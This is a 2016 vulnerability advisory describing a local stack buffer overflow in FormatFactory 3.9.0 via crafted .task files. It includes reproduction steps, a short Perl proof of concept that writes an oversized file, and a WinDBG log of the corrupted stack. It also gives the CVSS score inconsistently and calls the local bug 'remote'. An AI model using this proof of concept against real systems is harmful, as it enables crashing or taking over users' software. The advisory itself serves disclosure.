FormatFactory 3.9.0 .task Stack Overflow

`Document Title:  
===============  
FormatFactory 3.9.0 - (.task) Stack Overflow Vulnerability  
  
  
References (Source):  
====================  
http://www.vulnerability-lab.com/get_content.php?id=1935  
  
  
Release Date:  
=============  
2016-09-01  
  
  
Vulnerability Laboratory ID (VL-ID):  
====================================  
1935  
  
  
Common Vulnerability Scoring System:  
====================================  
6.1  
  
  
Product & Service Introduction:  
===============================  
FormatFactory is a type conversion software released as Freeware by Free Time only available on Windows. It can convert video files   
as well as audio and image files. It is also able to rip DVDs and CDs in other formats such as .iso image file. It can convert .flv   
files while many video conversion software does not support this feature.  
  
(Copy of the Vendor Homepage: http://www.pcfreetime.com/)  
  
  
Abstract Advisory Information:  
==============================  
An independent vulnerability laboratory research (ZwX) discovered a local stack buffer overflow vulnerability in the FormatFactory v3.9.0 software.  
  
  
Vulnerability Disclosure Timeline:  
==================================  
2016-09-01: Public Disclosure (Vulnerability Laboratory)  
  
  
Discovery Status:  
=================  
Published  
  
  
Affected Product(s):  
====================  
  
Exploitation Technique:  
=======================  
Local  
  
  
Severity Level:  
===============  
High  
  
  
Technical Details & Description:  
================================  
A local stack buffer overflow vulnerability has been discovered in the official FormatFactory v3.9.0 software.  
The overflow vulnerability allows remote attackers to take-over the process by overwrite of the active registers.  
  
A wrong validation check while loading a file (.task) results in a classic stack overflow that crashs the program.  
Remote attacker are finally able to overwrite for example the eip to control the vulnerable software process.  
The file format request in the software engine has no restriction of inputs or memory, when processing to request   
local .task files to queue.  
  
The security risk of the issue is estimated as high with a cvss (common vulnerability scoring system) count of 6.0.   
Exploitation of the vulnerability requires a low privilege or restricted system user account without user interaction.   
Successful exploitation of the vulnerability results in computer system manipulation and compromise of the computer system.  
  
Vulnerable File(s):  
[+] .task  
  
  
Proof of Concept (PoC):  
=======================  
A local buffer overflow vulnerability can be exploited by local attackers without user interaction and with low privileged system user account.  
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.  
  
  
Manual steps to reproduce the vulnerability ...  
1. Launch FormatFactoryr.exe  
2. Run the code in perl and a file format (.task) will create  
3. Click Spot - Task Load File  
4. Click on Video and MP4  
5. Click the button OK  
6. Software crash permanently  
7. Successfully reproduce of the local buffer overflow vulnerability!  
  
  
PoC: Exploit Code (Perl)   
#!/usr/bin/perl  
my $Buff = "x41" x 5000;  
open(MYFILE,'>>FormatFactory.task');  
print MYFILE $Buff;  
close(MYFILE);  
print "PoC by ZwX";  
  
  
--- Debug Session Logs [WinDBG] ---  
Stack buffer overflow - code c0000409  
eax=00000001 ebx=00000001 ecx=00000005 edx=77ae13f0 esi=015a9a18 edi=00000111  
eip=548e46a9 esp=015a9198 ebp=015a91b0 iopl=0 nv up ei pl nz na po nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202  
*** ERROR: Symbol file could not be found.   
Defaulted to export symbols for C:Program FilesFormatFactoryMSVCR120.dll - MSVCR120!invoke_watson+0xe:  
548e46a9 cd29 int 29h  
  
EXCEPTION_RECORD: ffffffff -- (.exr ffffffffffffffff)  
ExceptionAddress: 548e46a9 (MSVCR120!invoke_watson+0x0000000e)  
ExceptionCode: c0000409 (Stack buffer overflow)  
ExceptionFlags: 00000001  
NumberParameters: 1  
Parameter[0]: 00000005  
  
FAULTING_THREAD: 00000890  
BUGCHECK_STR: STACK_OVERRUN  
PROCESS_NAME: FormatFactory.exe  
FAULTING_MODULE: 77a50000 ntdll  
DEBUG_FLR_IMAGE_TIMESTAMP: 524f7ce6  
ERROR_CODE: (NTSTATUS) 0xc0000409 - Le syst me a d tect la saturation de la m moire tampon dans cette application.   
Cette saturation pourrait permettre un utilisateur mal intentionn de prendre le contr le de cette application.  
DEFAULT_BUCKET_ID: WRONG_SYMBOLS  
LAST_CONTROL_TRANSFER: from 548e467c to 548e46a9  
  
ChildEBP RetAddr   
WARNING: Stack unwind information not available. Following frames may be wrong.  
015a91b0 548e467c MSVCR120!invoke_watson+0xe  
015a91d4 54873600 MSVCR120!invalid_parameter_noinfo+0xc  
015a91f0 00e802ee MSVCR120!swprintf_s+0x17  
015aa0b8 00410041 FormatFactory!boost::asio::io_service::service::fork_service+0x9a6e  
015aa0bc 00410041 0x410041  
015aa0c0 00410041 0x410041  
015aa0c4 00410041 0x410041  
015aa0c8 00410041 0x410041  
015aa0cc 00410041 0x410041  
015aa0d0 00410041 0x410041  
015aa0d4 00410041 0x410041  
015aa0d8 00410041 0x410041  
015aa0dc 00410041 0x410041  
015aa0e0 00410041 0x410041  
015aa0e4 00410041 0x410041  
015aa0e8 00410041 0x410041  
015aa0ec 00410041 0x410041  
015aa0f0 00410041 0x410041  
015aa0f4 00410041 0x410041  
015aa0f8 00410041 0x410041  
0:000> d esi  
015a9a18 00 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.  
015a9a28 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.  
015a9a38 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.  
015a9a48 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.  
015a9a58 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.  
015a9a68 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.  
015a9a78 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.  
015a9a88 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.  
  
  
Security Risk:  
==============  
The security risk of the atack buffer overflow vulnerability in the software core of format factory is estimated as high. (CVSS 6.1)  
  
  
Credits & Authors:  
==================  
ZwX - [http://www.vulnerability-lab.com/show.php?user=ZwX]  
  
  
Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed   
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable   
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab   
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for   
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,   
deface websites, hack into databases or trade with stolen data.  
  
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com  
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact  
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab  
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php  
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php  
  
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.   
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by   
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark   
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.  
  
Copyright A(c) 2016 | Vulnerability Laboratory - [Evolution Security GmbH]aC/  
  
  
  
--   
VULNERABILITY LABORATORY - RESEARCH TEAM  
SERVICE: www.vulnerability-lab.com  
  
`